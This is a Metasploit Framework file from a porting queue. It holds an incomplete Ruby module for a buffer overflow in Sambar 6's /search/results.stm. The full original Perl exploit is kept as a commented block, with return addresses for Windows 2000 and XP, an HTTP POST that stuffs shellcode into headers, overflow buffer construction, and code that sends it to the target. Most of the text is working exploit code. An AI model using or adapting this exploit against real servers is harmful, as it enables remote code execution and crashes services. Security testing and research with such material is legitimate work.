metasploit-framework/dev/porting/queue/sambar6_search_results.rb

205 lines
5.2 KiB
Ruby
Raw Normal View History

require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sambar 6 Search Results Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow found in the
/search/results.stm application that comes with Sambar 6.
This code is a direct port of Andrew Griffiths's SMUDGE
exploit, the only changes made were to the nops and payload.
This exploit causes the service to die, whether you provided
the correct target or not.
},
'Author' => [ 'hdm', 'Andrew Griffiths <andrewg@felinemenace.org>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '2204'],
[ 'MIL', '56'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Jun 21 2003',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::sambar6_search_results;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Sambar 6 Search Results Buffer Overflow',
'Version' => '$Revision$',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
'Andrew Griffiths <andrewg [at] felinemenace.org>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 2000, # yes, we have as much space as we want :)
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
# example of allowing A-Z, a-z, 0-9, 0xc0+ only
#join("", map { $_=chr($_) } (0x00 .. 0x2f)).
#join("", map { $_=chr($_) } (0x3a .. 0x40)).
#join("", map { $_=chr($_) } (0x5B .. 0x60)).
#join("", map { $_=chr($_) } (0x7B .. 0xC0)),
},
'Description' => Pex::Text::Freeform(qq{
This exploits a buffer overflow found in the
/search/results.stm application that comes with Sambar 6.
This code is a direct port of Andrew Griffiths's SMUDGE
exploit, the only changes made were to the nops and payload.
This exploit causes the service to die, whether you provided
the correct target or not.
}),
'Refs' =>
[
['OSVDB', 2204],
['MIL', '56'],
],
'Targets' =>
[
['Windows 2000', 0x74fdee63, 0x773368f4],
['Windows XP', 0x77da78ff, 0x77e631ea],
],
'Keys' => ['sambar'],
'DisclosureDate' => 'Jun 21 2003',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my ($opsys, $jmpesp, $retaddr) = @{ $target };
$self->PrintLine("[*] Attemping to exploit Sambar with target '$opsys'");
my $request =
"POST /search/results.stm HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n".
"User-Agent: $shellcode\r\n".
"Accept: $shellcode\r\n".
"Accept-Encoding: $shellcode\r\n".
"Accept-Language: $shellcode\r\n".
"Accept-Ranges: $shellcode\r\n".
"Referrer: $shellcode\r\n".
"Connection: Keep-Alive\r\n".
"Pragma: no-cache\r\n".
"Content-Type: $shellcode\r\n";
# we use \xfc (cld) as nop, this code goes through tolower() and must be 0xc0->0xff
# int3's DO NOT WORK because it triggers an exception and causes the server to exit
my $jmpcode = "\xfc"."h". pack("V", $retaddr) . "\xfc\xfc\xfc"."\xc2\x34\xd1";
my $bigbuff = $jmpcode . ("X" x (128 - length($jmpcode))) . pack("VV", $jmpesp, $jmpesp) . $jmpcode;
my $content = "style=page&spage=0&indexname=docs&query=$bigbuff";
$request .= "Content-Length: " . length($content) . "\r\n\r\n" . $content;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine("[*] Waiting for a response...");
my $r = $s->Recv(-1);
if(!$r) {
$self->PrintLine("[*] Didn't get response, hoping for shell anyway");
}
else {
$self->PrintLine('[*] Got Response');
}
sleep(2);
$s->Close();
}
=end
end
end